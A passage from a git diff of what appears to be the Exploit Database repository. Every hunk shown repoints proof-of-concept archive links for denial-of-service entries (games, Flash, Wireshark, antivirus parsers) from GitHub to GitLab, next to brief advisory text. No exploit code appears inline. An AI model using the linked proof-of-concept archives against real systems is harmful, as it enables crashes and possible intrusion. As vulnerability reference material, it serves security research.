issue to crash the affected application, denying This issue affects World in Conflict 1.0.1.1 and prior versions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33099.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33099.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33100.txt b/exploits/multiple/dos/33100.txt index 392c5860a..713237466 100644 --- a/exploits/multiple/dos/33100.txt +++ b/exploits/multiple/dos/33100.txt @@ -8,4 +8,4 @@ The issue affects S.T.A.L.K.E.R. Clear Sky 1.5.10 (1.0010) and prior versions. NOTE: This issue may be related to the issue described in BID 29723 (S.T.A.L.K.E.R. Remote Denial of Service Vulnerability). We will update this BID if more information emerges. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33100.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33100.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33104.txt b/exploits/multiple/dos/33104.txt index 51614f6f2..ecdcff5af 100644 --- a/exploits/multiple/dos/33104.txt +++ b/exploits/multiple/dos/33104.txt @@ -7,4 +7,4 @@ Given the nature of this issue, the attacker may also be able to run arbitrary c This issue affects Star Wars Battlefront II 1.1 and prior versions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33104.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33104.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33105.txt b/exploits/multiple/dos/33105.txt index 738050de1..e2c2d9ad5 100644 --- a/exploits/multiple/dos/33105.txt +++ b/exploits/multiple/dos/33105.txt @@ -9,4 +9,4 @@ This issue affects the following: TrackMania Nations Forever 2.11.11 TrackMania United Forever 2.11.11 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33105.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33105.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33182.txt b/exploits/multiple/dos/33182.txt index 97d698525..8a8453b01 100644 --- a/exploits/multiple/dos/33182.txt +++ b/exploits/multiple/dos/33182.txt @@ -6,5 +6,5 @@ An attacker could exploit this issue to restart races on vulnerable servers, res Live For Speed S2 Z13 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33182-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33182-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33182-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33182-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33735.txt b/exploits/multiple/dos/33735.txt index ddeca5bfa..2bc7c8954 100644 --- a/exploits/multiple/dos/33735.txt +++ b/exploits/multiple/dos/33735.txt @@ -9,4 +9,4 @@ SUPERAntiSpyware and Super Ad Blocker are prone to multiple local vulnerabilitie An attacker can exploit these issues to gain elevated privileges on the affected computer, crash the affected computer, gain access to sensitive information, or overwrite arbitrary files. Other attacks are also possible. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33735.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33735.zip \ No newline at end of file diff --git a/exploits/multiple/dos/34270.txt b/exploits/multiple/dos/34270.txt index 9713be784..992424982 100644 --- a/exploits/multiple/dos/34270.txt +++ b/exploits/multiple/dos/34270.txt @@ -6,4 +6,4 @@ Successful exploits may allow attackers to cause denial-of-service conditions. D GRAW 1.35 and GRAW 2 1.05 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34270.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34270.zip \ No newline at end of file diff --git a/exploits/multiple/dos/34340.txt b/exploits/multiple/dos/34340.txt index 6dd2e50b5..e82c01c39 100644 --- a/exploits/multiple/dos/34340.txt +++ b/exploits/multiple/dos/34340.txt @@ -19,4 +19,4 @@ WarPath XIII Other games may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34340.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34340.zip \ No newline at end of file diff --git a/exploits/multiple/dos/34360.txt b/exploits/multiple/dos/34360.txt index 9fc285859..9fb5ee601 100644 --- a/exploits/multiple/dos/34360.txt +++ b/exploits/multiple/dos/34360.txt @@ -4,4 +4,4 @@ Monolith Lithtech Game Engine is prone to a memory-corruption vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, or execute arbitrary code within the context of the affected application. Other attacks may also be possible. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34360.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34360.zip \ No newline at end of file diff --git a/exploits/multiple/dos/34457.txt b/exploits/multiple/dos/34457.txt index e8f632918..11a13a04e 100644 --- a/exploits/multiple/dos/34457.txt +++ b/exploits/multiple/dos/34457.txt @@ -6,4 +6,4 @@ Successful exploits may allow remote attackers to cause denial-of-service condit Versions prior to Sniper Elite 1.0 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34457.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34457.zip \ No newline at end of file diff --git a/exploits/multiple/dos/35369.txt b/exploits/multiple/dos/35369.txt index ebb1434e7..ea59169e1 100644 --- a/exploits/multiple/dos/35369.txt +++ b/exploits/multiple/dos/35369.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to crash the application, resulting in a deni Battlefield 2 version 1.50 and Battlefield 2142 version 1.51 are vulnerable. Other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35369.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35369.zip \ No newline at end of file diff --git a/exploits/multiple/dos/36570.txt b/exploits/multiple/dos/36570.txt index 02e36a475..778e51140 100644 --- a/exploits/multiple/dos/36570.txt +++ b/exploits/multiple/dos/36570.txt @@ -4,4 +4,4 @@ Rockwell Automation FactoryTalk Activation Server is prone to multiple remote de An attacker can exploit these issues to crash the affected application, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36570.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36570.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37850.txt b/exploits/multiple/dos/37850.txt index afaa3c6d2..f1f82c043 100644 --- a/exploits/multiple/dos/37850.txt +++ b/exploits/multiple/dos/37850.txt @@ -29,4 +29,4 @@ function f(){ A fla, an AS file and two swfs are attached. shareddelete.fla compiles to shareddelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and shareddelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37850.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37850.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37852.txt b/exploits/multiple/dos/37852.txt index ef075d00b..47449e88e 100644 --- a/exploits/multiple/dos/37852.txt +++ b/exploits/multiple/dos/37852.txt @@ -31,4 +31,4 @@ function c(){ A fla, an AS file and two swfs are attached. donotdelete.fla compiles to donotdelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and donotdelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37852.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37852.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37855.txt b/exploits/multiple/dos/37855.txt index b49427ba0..6b628ed6c 100644 --- a/exploits/multiple/dos/37855.txt +++ b/exploits/multiple/dos/37855.txt @@ -38,4 +38,4 @@ function f(){ A fla, an AS file and two swfs are attached. slot.fla compiles to setnum.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and slot.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37855.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37855.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37859.txt b/exploits/multiple/dos/37859.txt index 65af6755e..312f530d0 100644 --- a/exploits/multiple/dos/37859.txt +++ b/exploits/multiple/dos/37859.txt @@ -54,4 +54,4 @@ function f(a, b){ A sample fla and swf are also attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37859.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37859.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37863.txt b/exploits/multiple/dos/37863.txt index 2b4bb5b58..ce5345506 100644 --- a/exploits/multiple/dos/37863.txt +++ b/exploits/multiple/dos/37863.txt @@ -23,4 +23,4 @@ function func() { A sample fla and swf is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37863.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37863.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37864.txt b/exploits/multiple/dos/37864.txt index 74a8415a7..8fbbd847a 100644 --- a/exploits/multiple/dos/37864.txt +++ b/exploits/multiple/dos/37864.txt @@ -46,4 +46,4 @@ function func(){ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37864.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37864.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37865.txt b/exploits/multiple/dos/37865.txt index 4a6661800..b81a92b2d 100644 --- a/exploits/multiple/dos/37865.txt +++ b/exploits/multiple/dos/37865.txt @@ -16,4 +16,4 @@ _root.attachMovie("myResetButton","newResetButton",200, n); A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37865.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37865.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37871.txt b/exploits/multiple/dos/37871.txt index 53d833089..22a09321a 100644 --- a/exploits/multiple/dos/37871.txt +++ b/exploits/multiple/dos/37871.txt @@ -21,4 +21,4 @@ function func(){ A swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37871.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37871.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37872.txt b/exploits/multiple/dos/37872.txt index c198c44dc..cc1ad1557 100644 --- a/exploits/multiple/dos/37872.txt +++ b/exploits/multiple/dos/37872.txt @@ -20,4 +20,4 @@ In [1], the passed in index is validated. In [2], the callback can run actionscr The PoC works by triggering a wild copy in order to demonstrate the crash. But other side-effects are possible such as decrementing the refcount of an out-of-bounds index. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37872.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37872.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37873.txt b/exploits/multiple/dos/37873.txt index d38e6e617..222a5e45b 100644 --- a/exploits/multiple/dos/37873.txt +++ b/exploits/multiple/dos/37873.txt @@ -21,4 +21,4 @@ function strfunc(){ A sample SWF and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37873.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37873.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37874.txt b/exploits/multiple/dos/37874.txt index 54cf738fc..25e6fdea9 100644 --- a/exploits/multiple/dos/37874.txt +++ b/exploits/multiple/dos/37874.txt @@ -13,4 +13,4 @@ This issue is low-impact because the type-confused objects are read into the fon A sample SWF and fla are attached, these samples intentionally crash to demonstrate the issue. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37874.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37874.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37877.txt b/exploits/multiple/dos/37877.txt index f23c4653c..b056814c0 100644 --- a/exploits/multiple/dos/37877.txt +++ b/exploits/multiple/dos/37877.txt @@ -20,4 +20,4 @@ function func(){ A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition, additional SWFs are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37877.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37877.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37878.txt b/exploits/multiple/dos/37878.txt index 5b04ed45f..47ba55ac0 100644 --- a/exploits/multiple/dos/37878.txt +++ b/exploits/multiple/dos/37878.txt @@ -48,4 +48,4 @@ function func(){ A sample SWF and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37878.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37878.zip \ No newline at end of file diff --git a/exploits/multiple/dos/37882.txt b/exploits/multiple/dos/37882.txt index ba6051eac..41a8da5f3 100644 --- a/exploits/multiple/dos/37882.txt +++ b/exploits/multiple/dos/37882.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=443& If an mp3 file contains compressed ID3 data that is larger than 0x2aaaaaaa bytes, an integer overflow will occur in allocating the buffer to contain its converted string data, leading to a large copy into a small buffer. A sample fla, swf and mp3 are attached. Put id34.swf and tag.mp3 in the same folder to reproduce the issue. This issue only works on 64 bit platforms. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37882.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37882.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38490.txt b/exploits/multiple/dos/38490.txt index e472b48b5..661cefdc5 100644 --- a/exploits/multiple/dos/38490.txt +++ b/exploits/multiple/dos/38490.txt @@ -9,4 +9,4 @@ This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571 One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38490.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38490.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38662.txt b/exploits/multiple/dos/38662.txt index 166c0350d..eec594c92 100644 --- a/exploits/multiple/dos/38662.txt +++ b/exploits/multiple/dos/38662.txt @@ -108,4 +108,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): The issue was reported in https://savannah.nongnu.org/bugs/?46379. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38662.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38662.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38930.txt b/exploits/multiple/dos/38930.txt index c93912c64..d63cb66a0 100644 --- a/exploits/multiple/dos/38930.txt +++ b/exploits/multiple/dos/38930.txt @@ -5,4 +5,4 @@ The attached file crashes in CmdExtract::UnstoreFile because the signed int64 De I observed this crash in Avast Antivirus, but the origin of the code appears to be the unrar source distribution. I imagine many other antiviruses will be affected, and presumably WinRAR and other archivers. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38930.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38930.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38931.txt b/exploits/multiple/dos/38931.txt index f9c09c25d..9fa9fe143 100644 --- a/exploits/multiple/dos/38931.txt +++ b/exploits/multiple/dos/38931.txt @@ -23,4 +23,4 @@ $7 = 0xe73f181f $8 = 0x1060 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38931.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38931.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38932.txt b/exploits/multiple/dos/38932.txt index 0f3f89211..fe05541d3 100644 --- a/exploits/multiple/dos/38932.txt +++ b/exploits/multiple/dos/38932.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=551 The attached Microsoft Access Database causes JetDb::IsExploited4x to be called, which contains an unbounded search for objects. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38932.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38932.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38933.txt b/exploits/multiple/dos/38933.txt index 30488aeff..d13c62050 100644 --- a/exploits/multiple/dos/38933.txt +++ b/exploits/multiple/dos/38933.txt @@ -29,4 +29,4 @@ ntdll!RtlpDeCommitFreeBlock+0x146: #12 0x0805498c in engine_scan () Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38933.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38933.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38969.txt b/exploits/multiple/dos/38969.txt index 4bb6f706b..55fbaf3b8 100644 --- a/exploits/multiple/dos/38969.txt +++ b/exploits/multiple/dos/38969.txt @@ -6,4 +6,4 @@ A sample swf is attached. ActionScript code is also attached, but it does not co Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38969.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38969.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38970.txt b/exploits/multiple/dos/38970.txt index 9256dc03d..358708609 100644 --- a/exploits/multiple/dos/38970.txt +++ b/exploits/multiple/dos/38970.txt @@ -16,4 +16,4 @@ To reproduce the issue, load objectencoding.swf. PoC code is also attached. To u Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38970.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38970.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38992.txt b/exploits/multiple/dos/38992.txt index 2ae80715e..3d2812ab4 100644 --- a/exploits/multiple/dos/38992.txt +++ b/exploits/multiple/dos/38992.txt @@ -60,4 +60,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11798. Attached is a file which triggers the crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38992.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38992.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38993.txt b/exploits/multiple/dos/38993.txt index a6c6fec55..8e2d21b94 100644 --- a/exploits/multiple/dos/38993.txt +++ b/exploits/multiple/dos/38993.txt @@ -91,4 +91,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38993.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38993.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38994.txt b/exploits/multiple/dos/38994.txt index b32a28c70..9da8cdb04 100644 --- a/exploits/multiple/dos/38994.txt +++ b/exploits/multiple/dos/38994.txt @@ -45,4 +45,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38994.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38994.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38995.txt b/exploits/multiple/dos/38995.txt index 9143d5cc0..0c08f5f45 100644 --- a/exploits/multiple/dos/38995.txt +++ b/exploits/multiple/dos/38995.txt @@ -251,4 +251,4 @@ Shadow byte legend (one shadow byte represents 8 application bytes): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38995.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38995.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38996.txt b/exploits/multiple/dos/38996.txt index 9dc30ab92..8f2cac610 100644 --- a/exploits/multiple/dos/38996.txt +++ b/exploits/multiple/dos/38996.txt @@ -96,4 +96,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38996.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38996.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38997.txt b/exploits/multiple/dos/38997.txt index 76a7b3f2e..6f52b10fb 100644 --- a/exploits/multiple/dos/38997.txt +++ b/exploits/multiple/dos/38997.txt @@ -63,4 +63,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38997.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38997.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38998.txt b/exploits/multiple/dos/38998.txt index 193376b83..a1f415da4 100644 --- a/exploits/multiple/dos/38998.txt +++ b/exploits/multiple/dos/38998.txt @@ -49,4 +49,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38998.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38998.zip \ No newline at end of file diff --git a/exploits/multiple/dos/38999.txt b/exploits/multiple/dos/38999.txt index dd91052af..f4a78d3fb 100644 --- a/exploits/multiple/dos/38999.txt +++ b/exploits/multiple/dos/38999.txt @@ -78,4 +78,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38999.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38999.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39000.txt b/exploits/multiple/dos/39000.txt index 882430866..ddc6d6f70 100644 --- a/exploits/multiple/dos/39000.txt +++ b/exploits/multiple/dos/39000.txt @@ -90,4 +90,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39000.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39000.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39001.txt b/exploits/multiple/dos/39001.txt index 205a456f3..7a3a47eb3 100644 --- a/exploits/multiple/dos/39001.txt +++ b/exploits/multiple/dos/39001.txt @@ -58,4 +58,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39001.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39001.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39002.txt b/exploits/multiple/dos/39002.txt index ae8f2bb59..740a91333 100644 --- a/exploits/multiple/dos/39002.txt +++ b/exploits/multiple/dos/39002.txt @@ -102,4 +102,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39002.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39002.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39003.txt b/exploits/multiple/dos/39003.txt index 2e9fcc4ae..512198cbe 100644 --- a/exploits/multiple/dos/39003.txt +++ b/exploits/multiple/dos/39003.txt @@ -103,4 +103,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39003.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39003.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39004.txt b/exploits/multiple/dos/39004.txt index deacbdb57..d92315387 100644 --- a/exploits/multiple/dos/39004.txt +++ b/exploits/multiple/dos/39004.txt @@ -61,4 +61,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39004.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39004.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39005.txt b/exploits/multiple/dos/39005.txt index fd6fcd053..cb48a1dae 100644 --- a/exploits/multiple/dos/39005.txt +++ b/exploits/multiple/dos/39005.txt @@ -87,4 +87,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39005.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39005.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39006.txt b/exploits/multiple/dos/39006.txt index 4c9fdcbb9..0e72226ed 100644 --- a/exploits/multiple/dos/39006.txt +++ b/exploits/multiple/dos/39006.txt @@ -66,4 +66,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39006.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39006.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39039.txt b/exploits/multiple/dos/39039.txt index 00f178b18..8139b9d78 100644 --- a/exploits/multiple/dos/39039.txt +++ b/exploits/multiple/dos/39039.txt @@ -64,4 +64,4 @@ and visit the attached html page, with the attached image in the same directory. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39039.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39039.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39076.txt b/exploits/multiple/dos/39076.txt index 80e38f0f1..a875b17d0 100644 --- a/exploits/multiple/dos/39076.txt +++ b/exploits/multiple/dos/39076.txt @@ -62,4 +62,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39076.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39076.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39077.txt b/exploits/multiple/dos/39077.txt index e4766d598..73d785f70 100644 --- 